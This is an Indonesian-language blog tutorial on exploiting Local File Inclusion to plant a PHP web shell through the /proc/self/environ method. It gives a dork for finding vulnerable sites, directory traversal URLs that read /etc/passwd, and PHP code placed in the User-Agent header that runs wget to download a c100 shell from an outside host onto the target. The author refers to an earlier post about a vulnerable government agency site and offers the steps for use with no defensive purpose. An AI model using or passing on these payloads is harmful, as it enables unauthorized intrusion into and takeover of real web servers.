Latest News

Cara Menanam Shell Lewat LFI (Local File Inclusion) Dengan Metode proc/self/environ

Setelah Kemaren Saya share tentang Situs Bappeda yang rentan serangan LFI kali ini sesuai janji saya, saya akan share Cara Menanam Shell Lewat LFI (Local File Inclusion) Dengan Metode proc/self/environ 

--| Intro |--

Local File Inclusion tuh kayak lobang di site yg bisa u manfaatin wad ngakses semua file yg ada dalam webserver cman bermodalkan browser "masa sih?" gk percaya yaudah Check This Shiit

--| Reff |--

1. kita nemuin website yang vuln LFI.

contoh : http://site.com/info.php?file=news.php

gmna cara nemuin nya. dork ja dgn keyword kayak gne "inurl:whatever.php?file=contoh.php"

whatever.php sama contoh.php ganti dengan file php yg sering dipake diweb kayak:news.php,info.php,article.php,index.php. etc



2. coba kita ganti “news.php” dengan “../../../”.

contoh : http://site.com/info.php?file=../../../

lalu kita mendapat error, seperti berikut…

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.

selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd



Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?

mari kita coba…

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd



Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

<strong>root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

irc:x:39:39:ircd:/var/run/ircd:/bin/sh

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

libuuid:x:100:101::/var/lib/libuuid:/bin/sh

syslog:x:101:102::/home/syslog:/bin/false

klog:x:102:103::/home/klog:/bin/false

hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false

avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false

gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false

saned:x:106:113::/home/saned:/bin/false

pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false

messagebus:x:108:117::/var/run/dbus:/bin/false

polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false

avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false

haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false

gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash

snmp:x:112:65534::/var/lib/snmp:/bin/false

guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash

sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin</strong>



3. mari kita check apakah /proc/self/environ bisa kita akses ?

sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ



Jika anda mendapatkan yang seperti ini :



<strong>DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15

</strong></pre>

<strong> PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80</strong>



Ternyata proc/self/environ dapat kita akses !

jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD



4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.

dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966

buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ

lalu pada user-agent isikan dengan kode berikut :



<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>

atau

<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>

lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

www.http://site.com/shell.php



6. udah ahh emak ane manggil minta dikerokin ktanya byee... use own ur risk @_@

-|Endtro|-
Post a Comment